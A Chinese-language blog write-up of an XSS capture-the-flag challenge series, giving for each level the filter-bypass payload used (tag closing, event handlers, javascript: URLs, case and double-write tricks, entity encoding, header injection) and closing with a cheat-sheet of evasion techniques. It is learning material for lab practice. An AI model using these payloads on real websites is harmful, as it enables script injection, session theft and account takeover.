因为我是边做边写博客,所以快捷目录就先不弄了,闲了再弄嘿嘿嘿
最近把xss复习一下,于是先找了个早一点的题 xss挑战之旅嘿嘿
第一关:
http://test.ctf8.com/level1.php?name=test
观察到通过get方式传参有会显,
直接打最简单的xss
playload:
<script>alert(1);</script>
第二关:
http://test.ctf8.com/level2.php?keyword=test
通过观察发现有个输入框,也是get方式传参,也有回显,先做一下测试
<script>alert(1);</script>
审查一下元素:
发现我们的js代码被input标签所包含,尝试闭合标签
playload:
"><script>alert(1);</script>
第三关:
还是get传参,我们先试验一下
"><script>alert(1);</script>
审查元素后,我们发现打的xss还是在input标签呢,
通过之前的闭合标签没有用,看一下网页源码
发现 " > < 被做了转义 所以尝试利用js事件绕过 也需要闭合标签,看了网页源码发现是单引号
(我常用的两个 onclick和oninput 当然还有,比如οnmοuseοver)
playload:
' onclick='alert(1) //点击
或者
' oninput='alert(1) //输入
第4关:
第四关还是像之前一样先用最简单的xss打一下,发现 <>被过滤了,
用第三题的playload试一下发现,没有闭合掉标签,playload直接显示了出来,
查看源码发现原来这里需要用双引号闭合
于是playload:
" onclick="alert(1)
或者
“ oninput=”alert(1)
第5关:
还是常规的思路 先拿最简单的试一下
发现 有过滤,直接把script改了 那我们再试一下 js事件
果然也是被过滤了,哈哈哈哈哈哈再咋说人家也是第5关嘞 试一下大小写看能不能行
不区分啊,那就换个思路,试一下新建个标签然后js伪协议
playload:
"><a href=javascript:alert(1);>1</a>
第6关:
打最简单的xss试一下:
还是过滤了,想必on也是做了过滤
没错,再用js伪协议试一下
他对href也做了过滤,我又试了一下大小写,本来我以为没有希望的时候(因为上个题就试了一下大小写不行),但没想到可以耶,早知道就打最简单的xss时就直接大写了
playload:(前面的playload都可以,只要大写绕过就好,记得要闭合标签哦)
"><a HREF=javascript:alert(1);>1</a>
第7题:
用最简单的xss打了一下,发现过滤了script
用js事件,发现也是过滤了
这里我想到了双写绕过,一般这种过滤整个关键字的,双写是个很好的思路
playload:
"><scscriptript>alert(1);</sscriptcript>
第8关:
一打开发现个添加外部链接的功能
这个肯定要试一下js伪协议啦
先看一下源码
这里不需要新建标签,源码中value的值直接传到了中,直接写
javascript:alert(1);
但没有用,看了源码发现 script被过滤,试一下大小写
没用,那就是一下html实体编码 t的html实体编码是t r是r
playload:
javascript:alert(1);
第9关:
还是有个添加链接的功能 试一下刚才的playload:
提示链接不合法
查看报错发现,应该要是http://才行
修改一下palyload
javascript:alert(1);//http://www.123.com
第10题
啥框都没了,就url 然后也有回显。打个最简单的xss
先看一下网页源码把
源码中漏出来破绽,发现有3个输入,并且<>也被过滤了,我想到了用js事件绕过,但这里并没有提供可以输入的文本框,所以我们可以写一个,所以playload的思路就是,输出源码中的三个值,并且利用写一个可输入的文本框,可以让我们利用js事件。
playload:
t_link=&t_history=&t_sort="onclick="alert()"type="text
第11题
感觉跟上一道题很像,直接看一下源码
有4个输入的值,也没有扫描框框,先打个最简单的xss看一下
发现<>做了过滤,上次的playload也没有用,很奇怪。说起来很巧,题目一开始我就查看了源码,感觉应该是题目一开始就给了提醒,我翻回去又看了一下,发现t_ref字段处存在注入漏洞
而且返回值是referer
推测可能是referer注入 思路大概就是抓包,然后在referer请求头中进行注入xss
playload:
" onclick=javascript:alert(1) type="text"
第12题
还是类似的,看了源码发现 新的输入
看到了属性值,发现应该是useragent注入
playload:
" onclick=javascript:alert(1) type="text"
第13题:
还是类似的哦,这次是要利用cookie进行注入
playload:
" onclick=javascript:alert(1) type="text"
第14题:
第14题就不一样啦,看了源码发现用iframe引用了一个页面
执行一个图片的exif信息中可以包含xss代码,这个不太懂,所以我就百度了
具体做法,上传图片,修改图片中的exif信息,打入我们的xss代码,然后利用浏览器查看就可以了。
第15题:我打不开。。。。。。溜了
第16题:
尝试一下打最简单的xss
过滤了script / 还有 空格,看了源码发现,输出位置的标签不能用,但空格会被过滤,所以可以考虑自己写个标签 用%0A %0B回车换行符绕过
playload:
<img%0Asrc=x%0Aonclick=alert(1)>
第17关:
偷个懒,直接看源码 发现存在embed标签
,embed标签本身就可以加入js事件,所以我们直接利用
playload:
onmouseover=alert(1) //前面有个空格,如果空格过滤的话跟上题一样用回车换行符绕过
第18关:
还是跟17题一样
存在embed标签
playload:
%0Aonclick=alert(1)
最后两题
flash xss 不太会
总结:
多看源码,从源码中找方法利用xss,同时也要注意标签的闭合
常用的绕过姿势:
- 新建html标签绕过
- 绕过一些过滤,比如双写,大小写,回车换行符,对标签属性值进行转码(比如html实体编码,改进制啥的)
- 利用js事件
- 利用css跨站解析
- 如果是style形式的 还可以插入\或者注释符/**/
- 插入混淆属性:
我们进行一般的文字录入时会发现,并不是所有带"JavaSceipt"这样的字符都会被过滤掉。而是只有在html标签内的特殊字符会被滤掉,这使得我们有了令一套绕过措施,在插入代码的属性前面插 入另一混淆属性,并在该属性中插入让过滤系统误以为是标签结束符的字符,从而让过滤系统认为执行代码在html标签的外面。比如:
< img src="abc>" οnmοuseοver="[code]">
//插入混淆的src属 性
<IMG """><SCRIPT>[code]</SCRIPT>">
//插入混 淆的双引号及 “>”符号
<SCRIPT a=">" SRC="xss.js"></SCRIPT>
//插入混淆的a 属性
7.用注释符分割
由于浏览器会忽略掉每种代码的注释符,因此如果我们在代码中的注释符就可以成功地欺骗过滤 系统并且不影响XSS代码的正常运行。比如:
<img style="xss:expr/*XSS*/ession([code])">
/css的注释符号 为/**/,其中的内容会被忽略
<style>@im\port'\ja\vasc\ript:alert("XSS")';</style>
//css中忽略的符号还有“\”
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression (alert("XSS"))'>
//注释混淆后的样子
<style><!--</style><script>[code]//-- ></script>
//html的注释符为